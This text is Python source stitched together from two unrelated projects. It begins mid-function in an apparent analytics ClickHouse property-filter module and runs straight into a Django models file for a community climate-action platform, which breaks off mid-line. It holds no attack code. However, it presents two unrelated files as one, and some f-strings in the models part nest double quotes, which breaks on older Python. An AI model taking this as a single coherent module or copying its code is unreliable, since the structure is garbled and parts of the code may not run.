prop_filter_json_extract( prop, idx, prepend, prop_var="{}properties".format(table_name), allow_denormalized_props=allow_denormalized_props, ) final.append(f"{filter_query} AND {table_name}team_id = %(team_id)s" if team_id else filter_query) params.update(filter_params) return " ".join(final), params def prop_filter_json_extract( prop: Property, idx: int, prepend: str = "", prop_var: str = "properties", allow_denormalized_props: bool = False ) -> Tuple[str, Dict[str, Any]]: # TODO: Once all queries are migrated over we can get rid of allow_denormalized_props property_expr, is_denormalized = get_property_string_expr( property_table(prop), prop.key, f"%(k{prepend}_{idx})s", prop_var, allow_denormalized_props ) operator = prop.operator params: Dict[str, Any] = {} if operator == "is_not": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value)} return ( "AND NOT has(%(v{prepend}_{idx})s, {left})".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator == "icontains": value = "%{}%".format(prop.value) params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): value} return ( "AND {left} ILIKE %(v{prepend}_{idx})s".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator == "not_icontains": value = "%{}%".format(prop.value) params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): value} return ( "AND NOT ({left} ILIKE %(v{prepend}_{idx})s)".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator in ("regex", "not_regex"): if not is_valid_regex(prop.value): return "AND 1 = 2", {} params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND {regex_function}({left}, %(v{prepend}_{idx})s)".format( regex_function="match" if operator == "regex" else "NOT match", idx=idx, prepend=prepend, left=property_expr, ), params, ) elif operator == "is_set": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} if is_denormalized: return ( "AND NOT isNull({left})".format(left=property_expr), params, ) return ( "AND JSONHas({prop_var}, %(k{prepend}_{idx})s)".format(idx=idx, prepend=prepend, prop_var=prop_var), params, ) elif operator == "is_not_set": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} if is_denormalized: return ( "AND isNull({left})".format(left=property_expr), params, ) return ( "AND (isNull({left}) OR NOT JSONHas({prop_var}, %(k{prepend}_{idx})s))".format( idx=idx, prepend=prepend, prop_var=prop_var, left=property_expr ), params, ) elif operator == "gt": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND toFloat64OrNull(trim(BOTH '\"' FROM replaceRegexpAll({left}, ' ', ''))) > %(v{prepend}_{idx})s".format( idx=idx, prepend=prepend, left=property_expr, ), params, ) elif operator == "lt": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND toFloat64OrNull(trim(BOTH '\"' FROM replaceRegexpAll({left}, ' ', ''))) < %(v{prepend}_{idx})s".format( idx=idx, prepend=prepend, left=property_expr, ), params, ) else: if is_json(prop.value) and not is_denormalized: clause = "AND has(%(v{prepend}_{idx})s, replaceRegexpAll(visitParamExtractRaw({prop_var}, %(k{prepend}_{idx})s),' ', ''))" params = { "k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value, remove_spaces=True), } else: clause = "AND has(%(v{prepend}_{idx})s, {left})" params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value)} return ( clause.format(left=property_expr, idx=idx, prepend=prepend, prop_var=prop_var), params, ) def property_table(property: Property) -> TableWithProperties: if property.type == "event": return "events" elif property.type == "person": return "person" else: raise ValueError(f"Property type does not have a table: {property.type}") def get_property_string_expr( table: TableWithProperties, property_name: PropertyName, var: str, prop_var: str, allow_denormalized_props: bool = True, ) -> Tuple[str, bool]: materialized_columns = get_materialized_columns(table) if allow_denormalized_props else {} # :TODO: Handle denormalized properties in person table if allow_denormalized_props and property_name in materialized_columns and table == "events": return materialized_columns[property_name], True return f"trim(BOTH '\"' FROM JSONExtractRaw({prop_var}, {var}))", False def box_value(value: Any, remove_spaces=False) -> List[Any]: if not isinstance(value, List): value = [value] return [str(value).replace(" ", "") if remove_spaces else str(value) for value in value] def get_property_values_for_key(key: str, team: Team, value: Optional[str] = None): parsed_date_from = "AND timestamp >= '{}'".format(relative_date_parse("-7d").strftime("%Y-%m-%d 00:00:00")) parsed_date_to = "AND timestamp <= '{}'".format(timezone.now().strftime("%Y-%m-%d 23:59:59")) if value: return sync_execute( SELECT_PROP_VALUES_SQL_WITH_FILTER.format(parsed_date_from=parsed_date_from, parsed_date_to=parsed_date_to), {"team_id": team.pk, "key": key, "value": "%{}%".format(value)}, ) return sync_execute( SELECT_PROP_VALUES_SQL.format(parsed_date_from=parsed_date_from, parsed_date_to=parsed_date_to), {"team_id": team.pk, "key": key}, ) def filter_element(filters: Dict, *, operator: Optional[OperatorType] = None, prepend: str = "") -> Tuple[str, Dict]: if not operator: operator = "exact" params = {} final_conditions = [] if filters.get("selector") is not None: if operator not in ("exact", "is_not"): raise exceptions.ValidationError( 'Filtering by element selector only supports operators "equals" and "doesn\'t equal" currently.' ) selectors = filters["selector"] if isinstance(filters["selector"], list) else [filters["selector"]] if selectors: combination_conditions = [] for idx, query in enumerate(selectors): selector = Selector(query, escape_slashes=False) key = f"{prepend}_{idx}_selector_regex" params[key] = build_selector_regex(selector) combination_conditions.append(f"match(elements_chain, %({key})s)") final_conditions.append(f"({' OR '.join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty selector list provided, it can't match anything return "0 = 191", {} if filters.get("tag_name") is not None: if operator not in ("exact", "is_not"): raise exceptions.ValidationError( 'Filtering by element tag only supports operators "equals" and "doesn\'t equal" currently.' ) tag_names = filters["tag_name"] if isinstance(filters["tag_name"], list) else [filters["tag_name"]] if tag_names: combination_conditions = [] for idx, tag_name in enumerate(tag_names): key = f"{prepend}_{idx}_tag_name_regex" params[key] = rf"(^|;){tag_name}(\.|$|;|:)" combination_conditions.append(f"match(elements_chain, %({key})s)") final_conditions.append(f"({' OR '.join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty tag_name list provided, it can't match anything return "0 = 192", {} attributes: Dict[str, List] = {} for key in ["href", "text"]: if filters.get(key) is not None: attributes[key] = process_ok_values(filters[key], operator) if attributes: for key, ok_values in attributes.items(): if ok_values: combination_conditions = [] for idx, value in enumerate(ok_values): optional_flag = "(?i)" if operator.endswith("icontains") else "" params[f"{prepend}_{key}_{idx}_attributes_regex"] = f'{optional_flag}({key}="{value}")' combination_conditions.append(f"match(elements_chain, %({prepend}_{key}_{idx}_attributes_regex)s)") final_conditions.append(f"({' OR '.join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty href or text list provided, it can't match anything return "0 = 193", {} if final_conditions: return f"{'NOT ' if operator in NEGATED_OPERATORS else ''}({' AND '.join(final_conditions)})", params else: return "", {} def process_ok_values(ok_values: Any, operator: OperatorType) -> List[str]: if operator.endswith("_set"): return [r'[^"]+'] else: # Make sure ok_values is a list ok_values = cast(List[str], [str(val) for val in ok_values]) if isinstance(ok_values, list) else [ok_values] # Escape double quote characters, since e.g. text 'foo="bar"' is represented as text="foo=\"bar\"" # in the elements chain ok_values = [text.replace('"', r"\"") for text in ok_values] if operator.endswith("icontains"): # Process values for case-insensitive-contains matching by way of regex, # making sure matching scope is limited to between double quotes return [rf'[^"]*{re.escape(text)}[^"]*' for text in ok_values] if operator.endswith("regex"): # Use values as-is in case of regex matching return ok_values # For all other operators escape regex-meaningful sequences return [re.escape(text) for text in ok_values] def build_selector_regex(selector: Selector) -> str: regex = r"" for tag in selector.parts: if tag.data.get("tag_name") and isinstance(tag.data["tag_name"], str): if tag.data["tag_name"] == "*": regex += ".+" else: regex += tag.data["tag_name"] if tag.data.get("attr_class__contains"): regex += r".*?\.{}".format(r"\..*?".join(sorted(tag.data["attr_class__contains"]))) if tag.ch_attributes: regex += ".*?" for key, value in sorted(tag.ch_attributes.items()): regex += '{}="{}".*?'.format(key, value) regex += r"([-_a-zA-Z0-9\.]*?)?($|;|:([^;^\s]*(;|$|\s)))" if tag.direct_descendant: regex += ".*" return regex def extract_tables_and_properties(props: List[Property]) -> Set[Tuple[PropertyName, PropertyType]]: return set((prop.key, prop.type) for prop in props)
import datetime import json from django.db import models from django.db.models.fields import BooleanField, related from django.db.models.query_utils import select_related_descend from database.utils.constants import * from .utils.common import json_loader, get_json_if_not_none, get_summary_info from django.forms.models import model_to_dict from carbon_calculator.models import Action as CCAction import uuid CHOICES = json_loader("./database/raw_data/other/databaseFieldChoices.json") ZIP_CODE_AND_STATES = json_loader("./database/raw_data/other/states.json") class Location(models.Model): """ A class used to represent a geographical region. It could be a complete and proper address or just a city name, zipcode, county etc Attributes ---------- type : str the type of the location, whether it is a full address, zipcode only, etc street : str The street number if it is available city : str the name of the city if available county : str the name of the county if available state: str the name of the state if available more_info: JSON any anotheraction() dynamic information we would like to store about this location """ id = models.AutoField(primary_key=True) location_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("LOCATION_TYPES", {}).items() ) street = models.CharField(max_length=SHORT_STR_LEN, blank=True) unit_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) zipcode = models.CharField(max_length=SHORT_STR_LEN, blank=True) city = models.CharField(max_length=SHORT_STR_LEN, blank=True) county = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) state = models.CharField( max_length=SHORT_STR_LEN, choices=ZIP_CODE_AND_STATES.items(), blank=True ) country = models.CharField(max_length=SHORT_STR_LEN, default="US", blank=True) more_info = models.JSONField(blank=True, null=True) def __str__(self): # show full loc regardless of tye type its labelled as loc = "" d = lambda: ", " if loc != "" else "" if self.street: loc += self.street if self.unit_number: loc += d() + "#" + self.unit_number if self.city: loc += d() + self.city if self.zipcode: loc += d() + self.zipcode if self.county: loc += d() + self.county if self.state: loc += d() + self.state if self.country and self.country != "US": loc += d() + self.country loc += "-" + self.location_type return loc def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: db_table = "locations" class Media(models.Model): """ A class used to represent any Media that is uploaded to this website Attributes ---------- name : SlugField The short name for this media. It cannot only contain letters, numbers, hypens and underscores. No spaces allowed. file : File the file that is to be stored. media_type: str the type of this media file whether it is an image, video, pdf etc. """ id = models.AutoField(primary_key=True) name = models.SlugField(max_length=SHORT_STR_LEN, blank=True) file = models.FileField(upload_to="media/") media_type = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) order = models.PositiveIntegerField(default=0, blank=True, null=True) def __str__(self): return str(self.id) + "-" + self.name + "(" + self.file.name + ")" def simple_json(self): return { "id": self.id, "url": self.file.url, } def full_json(self): return { "id": self.id, "name": self.name, "url": self.file.url, "media_type": self.media_type, } class Meta: db_table = "media" ordering = ("order", "name") class Policy(models.Model): """ A class used to represent a Legal Policy. For instance the Terms and Agreement Statement that users have to agree to during sign up. Attributes ---------- name : str name of the Legal Policy description: str the details of this policy communities_applied: how many communities this policy applies to. is_global: boolean True if this policy should apply to all the communities info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): # would this blow up because no community_set? res = model_to_dict(self) community = self.community_set.all().first() if community: res["community"] = get_json_if_not_none(community) return res class Meta: ordering = ("name",) db_table = "legal_policies" verbose_name_plural = "Legal Policies" class Goal(models.Model): """ A class used to represent a Goal Attributes ---------- name : str A short title for this goal status: str the status of this goal whether it has been achieved or not. description: More details about this goal target_date: Date at which goal should be achieved created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN, blank=True) target_number_of_households = models.PositiveIntegerField(default=0, blank=True) target_number_of_actions = models.PositiveIntegerField(default=0, blank=True) target_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) initial_number_of_households = models.PositiveIntegerField(default=0, blank=True) initial_number_of_actions = models.PositiveIntegerField(default=0, blank=True) initial_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) attained_number_of_households = models.PositiveIntegerField(default=0, blank=True) attained_number_of_actions = models.PositiveIntegerField(default=0, blank=True) attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_households = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_actions = models.PositiveIntegerField( default=0, blank=True ) organic_attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) target_date = models.DateField(null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} {" - Deleted" if self.is_deleted else ""}" def simple_json(self): return model_to_dict(self, exclude=["is_deleted"]) def full_json(self): return self.simple_json() class Meta: db_table = "goals" class Community(models.Model): """ A class used to represent a Community on this platform. Attributes ---------- name : str The short name for this Community subdomain : str (can only contain alphabets, numbers, hyphen and underscores) a primary unique identifier for this Community. They would need the same to access their website. For instance if the subdomain is wayland they would access their portal through wayland.massenergize.org owner: JSON information about the name, email and phone of the person who is supposed to be owner and main administrator when this Community account is opened. logo : int Foreign Key to Media that holds logo of community banner : int Foreign Key to Media that holds logo of community is_geographically_focused: boolean Information about whether this community is geographically focused or dispersed is_approved: boolean This field is set to True if the all due diligence has been done by the Super Admins and the community is not allowed to operate. created_at: DateTime The date and time that this community was created policies: ManyToMany policies created by community admins for this community created_at: DateTime The date and time of the last time any updates were made to the information about this community more_info: JSON any another dynamic information we would like to store about this location """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) subdomain = models.SlugField(max_length=SHORT_STR_LEN, unique=True, db_index=True) owner_name = models.CharField(max_length=SHORT_STR_LEN, default="Unknown") owner_email = models.EmailField(blank=False) owner_phone_number = models.CharField( blank=True, null=True, max_length=SHORT_STR_LEN ) about_community = models.TextField(max_length=LONG_STR_LEN, blank=True) logo = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_logo", ) banner = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_banner", ) favicon = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_favicon", ) goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) is_geographically_focused = models.BooleanField(default=False, blank=True) # deprecated: location of community was originally a JSON string; now defined below in locations (link to Location model) location = models.JSONField(blank=True, null=True) # new - define the geographic area for a community (zipcodes, towns/cities, counties, states, countries) geography_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("COMMUNITY_GEOGRAPHY_TYPES", {}).items(), blank=True, null=True, ) # locations defines the range for geographic communities locations = models.ManyToManyField(Location, blank=True) policies = models.ManyToManyField(Policy, blank=True) is_approved = models.BooleanField(default=False, blank=True) accepted_terms_and_conditions = models.BooleanField(default=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return str(self.id) + " - " + self.name def info(self): return model_to_dict(self, ["id", "name", "subdomain"]) def simple_json(self): res = model_to_dict( self, [ "id", "name", "subdomain", "is_approved", "owner_phone_number", "owner_name", "owner_email", "is_geographically_focused", "is_published", "is_approved", "more_info", "location", ], ) res["logo"] = get_json_if_not_none(self.logo) res["favicon"] = get_json_if_not_none(self.favicon) return res def full_json(self): admin_group: CommunityAdminGroup = CommunityAdminGroup.objects.filter( community__id=self.pk ).first() if admin_group: admins = [a.simple_json() for a in admin_group.members.all()] else: admins = [] customDomain: CustomCommunityWebsiteDomain = ( CustomCommunityWebsiteDomain.objects.filter(community__id=self.pk) ) website = None if customDomain: website = customDomain.first().website # get the community goal goal = get_json_if_not_none(self.goal) or {} # goal defined consistently; not differently in two places if self.is_geographically_focused: goal[ "organic_attained_number_of_households" ] = RealEstateUnit.objects.filter(is_deleted=False, community=self).count() done_actions = UserActionRel.objects.filter( real_estate_unit__community=self, status="DONE" ).prefetch_related("action__calculator_action") else: community_members = CommunityMember.objects.filter( is_deleted=False, community=self ).select_related("user") users = [cm.user for cm in community_members] members_count = community_members.count() goal["organic_attained_number_of_households"] = members_count done_actions = UserActionRel.objects.filter( user__in=users, status="DONE" ).prefetch_related("action__calculator_action") goal["organic_attained_number_of_actions"] = done_actions.count() carbon_footprint_reduction = 0 for actionRel in done_actions: if actionRel.action and actionRel.action.calculator_action: carbon_footprint_reduction += ( actionRel.action.calculator_action.average_points ) goal["organic_attained_carbon_footprint_reduction"] = carbon_footprint_reduction locations = "" for loc in self.locations.all(): if locations != "": locations += ", " if self.geography_type == "ZIPCODE": l = loc.zipcode elif self.geography_type == "CITY": l = loc.city elif self.geography_type == "COUNTY": l = loc.county elif self.geography_type == "STATE": l = loc.state elif self.geography_type == "COUNTRY": l = loc.country else: l = loc.zipcode locations += l return { "id": self.id, "name": self.name, "subdomain": self.subdomain, "website": website, "owner_name": self.owner_name, "owner_email": self.owner_email, "owner_phone_number": self.owner_phone_number, "goal": goal, "about_community": self.about_community, "logo": get_json_if_not_none(self.logo), "favicon": get_json_if_not_none(self.favicon), "location": self.location, "is_approved": self.is_approved, "is_published": self.is_published, "is_geographically_focused": self.is_geographically_focused, "banner": get_json_if_not_none(self.banner), "created_at": self.created_at, "updated_at": self.updated_at, "more_info": self.more_info, "admins": admins, "geography_type": self.geography_type, "locations": locations, } class Meta: verbose_name_plural = "Communities" db_table = "communities" class RealEstateUnit(models.Model): """ A class used to represent a Real Estate Unit. Attributes ---------- unit_type : str The type of this unit eg. Residential, Commercial, etc location: Location the geographic address or location of this real estate unit created_at: DateTime The date and time that this real estate unity was added created_at: DateTime The date and time of the last time any updates were made to the information about this real estate unit """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) unit_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("REAL_ESTATE_TYPES", {}).items() ) community = models.ForeignKey( Community, null=True, on_delete=models.SET_NULL, blank=True ) location = models.JSONField(blank=True, null=True) # added 1/28/21 - redundant to location, address will have Zip code, defining which community the REU is in address = models.ForeignKey(Location, null=True, on_delete=models.SET_NULL) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def is_commercial(self): return self.unit_type == "C" def is_residential(self): return self.unit_type == "R" def __str__(self): return f"{self.community}|{self.unit_type}|{self.name}" def simple_json(self): # return model_to_dict(self) res = model_to_dict(self) res["location"] = get_json_if_not_none(self.address) return res def full_json(self): return self.simple_json() class Meta: db_table = "real_estate_units" class Role(models.Model): """ A class used to represent Role for users on the MassEnergize Platform Attributes ---------- name : str name of the role """ id = models.AutoField(primary_key=True) name = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("ROLE_TYPES", {}).items(), unique=True, ) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return CHOICES.get("ROLE_TYPES", {})[self.name] def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "roles" class UserProfile(models.Model): """ A class used to represent a MassEnergize User Note: Authentication is handled by firebase so we just need emails Attributes ---------- email : str email of the user. Should be unique. user_info: JSON a JSON representing the name, bio, etc for this user. bio: A short biography of this user is_super_admin: boolean True if this user is an admin False otherwise is_community_admin: boolean True if this user is an admin for a community False otherwise is_vendor: boolean True if this user is a vendor False otherwise other_info: JSON any another dynamic information we would like to store about this UserProfile created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal #TODO: roles field: if we have this do we need is_superadmin etc? also why # not just one? why many to many """ id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True) full_name = models.CharField(max_length=SHORT_STR_LEN, null=True) profile_picture = models.ForeignKey( Media, on_delete=models.SET_NULL, blank=True, null=True, related_name="profile_picture", ) preferred_name = models.CharField(max_length=SHORT_STR_LEN, null=True) email = models.EmailField(unique=True, db_index=True) user_info = models.JSONField(blank=True, null=True) real_estate_units = models.ManyToManyField( RealEstateUnit, related_name="user_real_estate_units", blank=True ) goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) communities = models.ManyToManyField(Community, blank=True) roles = models.ManyToManyField(Role, blank=True) is_super_admin = models.BooleanField(default=False, blank=True) is_community_admin = models.BooleanField(default=False, blank=True) is_vendor = models.BooleanField(default=False, blank=True) other_info = models.JSONField(blank=True, null=True) accepts_terms_and_conditions = models.BooleanField(default=False, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) preferences = models.JSONField(default=dict, null=True, blank=True) visit_log = models.JSONField(default=list, null=True, blank=True) def __str__(self): return self.email def info(self): return model_to_dict(self, ["id", "email", "full_name"]) def simple_json(self): res = model_to_dict( self, [ "id", "full_name", "preferred_name", "email", "is_super_admin", "is_community_admin", ], ) res["joined"] = self.created_at.date() res["user_info"] = self.user_info res["profile_picture"] = get_json_if_not_none(self.profile_picture) res["communities"] = [ c.community.name for c in CommunityMember.objects.filter(user=self) ] res["households"] = [h.simple_json() for h in self.real_estate_units.all()] return res def update_visit_log(self, date_time): try: new_format = "%Y/%m/%d" date = date_time.strftime(new_format) # We adapt the old fomat to the new one if type(self.visit_log) == dict: old = self.visit_log new = [] for day in old.keys(): old_format = "%d/%m/%Y" dt_object = datetime.datetime.strptime(day, old_format) day = dt_object.strftime(new_format) new.append(day) self.visit_log = new if type(self.visit_log) == list: if len(self.visit_log) > 0: if date != self.visit_log[-1]: self.visit_log.append(date) else: self.visit_log.append(date) except Exception as e: print(e) return None, e def full_json(self): team_members = [t.team.info() for t in TeamMember.objects.filter(user=self)] community_members = CommunityMember.objects.filter(user=self) communities = [cm.community.info() for cm in community_members] # admin_at = [ // TODO: Remove -> because we stopped using this, and started using CommunityAdminGroupBelow # cm.community.info() # for cm in CommunityMember.objects.filter(user=self, is_admin=True) # ] data = model_to_dict( self, exclude=["real_estate_units", "communities", "roles"] ) data["joined"] = self.created_at.date() admin_at = [ get_json_if_not_none(c.community) for c in self.communityadmingroup_set.all() ] data["households"] = [h.simple_json() for h in self.real_estate_units.all()] data["goal"] = get_json_if_not_none(self.goal) data["communities"] = communities data["admin_at"] = admin_at data["teams"] = team_members data["profile_picture"] = get_json_if_not_none(self.profile_picture) data["visit_log"] = self.visit_log return data class Meta: db_table = "user_profiles" ordering = ("-created_at",) class UserMediaUpload(models.Model): """A class that creates a relationship between a user(all user kinds) on the platform and media they have uploaded""" id = models.AutoField(primary_key=True) user = models.ForeignKey( UserProfile, null=True, related_name="uploads", on_delete=models.DO_NOTHING, ) communities = models.ManyToManyField( Community, related_name="community_uploads", ) media = models.OneToOneField( Media, null=True, related_name="user_upload", on_delete=models.CASCADE, ) is_universal = BooleanField( default=False ) # True value here means image is available to EVERYONE, and EVERY COMMUNITY settings = models.JSONField(null=True, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{str(self.id)} - {self.media.name} from {self.user.preferred_name or self.user.full_name} " def simple_json(self): res = model_to_dict( self, ["settings", "media", "created_at", "id", "is_universal"] ) res["user"] = get_summary_info(self.user) res["image"] = get_json_if_not_none(self.media) res["communities"] = [get_summary_info(com) for com in self.communities.all()] return res def full_json(self): return self.simple_json() class DeviceProfile(models.Model): """ A class used to represent a MassEnergize User's Device Attributes ---------- user_profiles : JSON A JSON object containing all user ids (as foreign keys) for any users asociated with this device. IP_address: Char The asociated IP address with this device. device_type: Char The type of device we see from the HTTP request. operating_system: The operating system we see from the HTTP request. browser: The browser we see from the HTTP request. visit_log: A JSON object containing a history of dates. Activity will only be logged here if there is a user attached to the device and they are logged in. #TODO: """ id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True) user_profiles = models.ManyToManyField(UserProfile, blank=True) ip_address = models.CharField(max_length=SHORT_STR_LEN, null=True) location = models.ManyToManyField(Location, blank=True) device_type = models.CharField(max_length=SHORT_STR_LEN, null=True) operating_system = models.CharField(max_length=SHORT_STR_LEN, null=True) browser = models.CharField(max_length=SHORT_STR_LEN, null=True) visit_log = models.JSONField(default=list, null=True, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def get_user_profiles(self): return json.load(self.user_profiles) def get_visit_log(self): return json.load(self.visit_log) def update_device_location(self, location): self.location.add(location) def update_user_profiles(self, user): self.user_profiles.add(user) def update_visit_log(self, date_time): try: new_format = "%Y/%m/%d" date = date_time.strftime(new_format) # We adapt the old fomat to the new one if type(self.visit_log) == dict: old = self.visit_log new = [] for day in old.keys(): old_format = "%d/%m/%Y" dt_object = datetime.datetime.strptime(day, old_format) day = dt_object.strftime(new_format) new.append(day) self.visit_log = new if type(self.visit_log) == list: if len(self.visit_log) > 0: if date != self.visit_log[-1]: self.visit_log.append(date) else: self.visit_log.append(date) except Exception as e: print(e) return None, e def simple_json(self): res = model_to_dict( self, [ "id", "ip_address", "device_type", "operating_system", "browser", "visit_log", "is_deleted", ], ) res["user_profiles"] = [u.simple_json() for u in self.user_profiles.all()] return res def full_json(self): return self.simple_json() class CommunityMember(models.Model): id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) is_admin = models.BooleanField(blank=True, default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.user} is {"an ADMIN" if self.is_admin else "a MEMBER"} in Community({self.community})" def simple_json(self): res = model_to_dict(self, ["id", "is_admin"]) res["community"] = get_summary_info(self.community) res["user"] = get_summary_info(self.user) return res def full_json(self): return self.simple_json() class Meta: db_table = "community_members_and_admins" unique_together = [["community", "user"]] ordering = ("-created_at",) class Subdomain(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, related_name="subdomain_community", ) in_use = models.BooleanField(default=False, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{self.community} - {self.name}" def simple_json(self): res = model_to_dict(self, ["id", "in_use", "name", "created_at", "updated_at"]) res["community"] = get_summary_info(self.community) return res def full_json(self): return self.simple_json() class Meta: db_table = "subdomains" class CustomCommunityWebsiteDomain(models.Model): id = models.AutoField(primary_key=True) website = models.CharField(max_length=SHORT_STR_LEN, unique=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, related_name="community_website", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{self.website}-{self.community}" def simple_json(self): res = model_to_dict(self, ["id", "website", "created_at", "updated_at"]) res["community"] = get_summary_info(self.community) return res def full_json(self): return self.simple_json() class Meta: db_table = "custom_community_website_domain" class Team(models.Model): """ A class used to represent a Team in a community Attributes ---------- name : str name of the team. Need not be unique description: str description of this team admins: ManyToMany administrators for this team members: ManyToMany the team members community: which community this team is a part of logo: Foreign Key to Media file represtenting the logo for this team banner: Foreign Key to Media file represtenting the banner for this team created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) # Team names should be unique globally (Not!) name = models.CharField(max_length=SHORT_STR_LEN) tagline = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) admins = models.ManyToManyField(UserProfile, related_name="team_admins", blank=True) # not used members = models.ManyToManyField( UserProfile, related_name="team_members", blank=True ) # change this from ForeignKey to ManyToManyField to allow team to span communities # rename community to primary_community - this is the one whose cadmin can add/delete other communities, and which is unique with name communities = models.ManyToManyField( Community, related_name="community_teams", blank=True ) primary_community = models.ForeignKey( Community, related_name="primary_community_teams", on_delete=models.CASCADE ) images = models.ManyToManyField( Media, related_name="teams" ) # 0 or more photos - could be a slide show video_link = models.CharField( max_length=LONG_STR_LEN, blank=True ) # allow one video is_closed = models.BooleanField( default=False, blank=True ) # by default, teams are open team_page_options = models.JSONField( blank=True, null=True ) # settable team page options parent = models.ForeignKey( "self", null=True, on_delete=models.SET_NULL ) # for the case of sub-teams goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) logo = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_logo", ) banner = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_banner", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def is_admin(self, UserProfile): return self.admins.filter(id=UserProfile.id) # def is_member(self, UserProfile): # return self.members.filter(id=UserProfile.id) def __str__(self): return self.name def info(self): return model_to_dict(self, ["id", "name", "tagline", "description"]) def simple_json(self): res = self.info() res["primary_community"] = get_json_if_not_none(self.primary_community) res["logo"] = 